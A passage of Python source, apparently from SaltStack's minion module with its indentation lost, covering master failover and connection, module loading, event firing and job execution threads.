opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
resolve_dns_fallback = opts.get('resolve_dns_fallback', False)
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
opts['local_masters'] = copy.copy(opts['master'])
if opts['random_master']:
shuffle(opts['local_masters'])
last_exc = None
opts['master_uri_list'] = list()
# This sits outside of the connection loop below because it needs to set
# up a list of master URIs regardless of which masters are available
# to connect _to_. This is primarily used for masterless mode, when
# we need a list of master URIs to fire calls back to.
for master in opts['local_masters']:
opts['master'] = master
opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])
while True:
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
try:
opts.update(resolve_dns(opts, fallback=resolve_dns_fallback))
except SaltClientError as exc:
last_exc = exc
msg = ('Master hostname: \'{0}\' not found. Trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
msg = ('No master could be reached or all masters '
'denied the minions connection attempt.')
log.error(msg)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
opts.update(prep_ip_port(opts))
try:
opts.update(resolve_dns(opts, fallback=resolve_dns_fallback))
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not HAS_ZMQ:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if self.opts['transport'] == 'zeromq' and HAS_ZMQ:
io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
io_loop = LOOP_CLASS.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['environment'] is not None:
penv = self.opts['environment']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.fopen(ptop, 'wb') as fp_:
fp_.write(yaml.dump(cache_top))
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.fopen(cache_sls, 'wb') as fp_:
fp_.write(yaml.dump(self.opts['pillar']))
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
if self.opts.get('master_type') != 'disable':
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
funcs=self.functions,
rend=self.rend,
).compile_pillar()
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(opts['conf_file'], ignore_config_errors=ignore_config_errors)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
self.process_manager = ProcessManager(name='MultiMinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
def __del__(self):
self.destroy()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
masters = self.opts['master']
if self.opts['master_type'] == 'failover' or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue,
)
self.minions.append(minion)
self.io_loop.spawn_callback(self._connect_minion, minion)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = minion.opts['acceptance_wait_time']
while True:
try:
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(minion.opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(minion.opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
def reload(self):
for minion in self.minions:
minion.reload()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = jid_queue
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')] # pylint: disable=no-member
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
log.info('Creating minion process manager')
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
def reload(self):
log.info('Minion reloading config')
disk_opts = salt.config.minion_config(os.path.join(salt.syspaths.CONFIG_DIR, 'minion')) # FIXME POC
self.opts = salt.utils.dictupdate.merge_overwrite(self.opts, disk_opts)
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
self.grains_cache = self.opts['grains']
self.ready = True
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: {0} or return_retry_timer_max: {1})'
'both must be a positive integers'.format(
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions)
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
def timeout_handler(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
return True
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
return False
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
# Don't duplicate jobs
log.trace('Started JIDs: {0}'.format(self.jid_queue))
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.enter_context(self.functions.context_dict.clone())
exitstack.enter_context(self.returners.context_dict.clone())
exitstack.enter_context(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if function_name != 'saltutil.refresh_pillar' and \
function_name not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get'])
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo.get':
if executors[-1] in FUNCTION_EXECUTORS:
executors[-1] = 'sudo.get' # replace
else:
executors.append('sudo.get') # append
log.trace('Executors list {0}'.format(executors)) # pylint: disable=no-member
# Get executors
def get_executor(name):
executor_class = minion_instance.executors.get(name)
if executor_class is None:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return executor_class
# Get the last one that is function executor
executor = get_executor(executors.pop())(opts, data, func, args, kwargs)
# Instantiate others from bottom to the top
for executor_name in reversed(executors):
executor = get_executor(executor_name)(opts, data, executor)
return_data = executor.execute()
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in \'{0}\' had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing \'{0}\': {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, )
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if data['fun'][ind] != 'saltutil.refresh_pillar' and \
data['fun'][ind] not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['retcode'][data['fun'][ind]] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
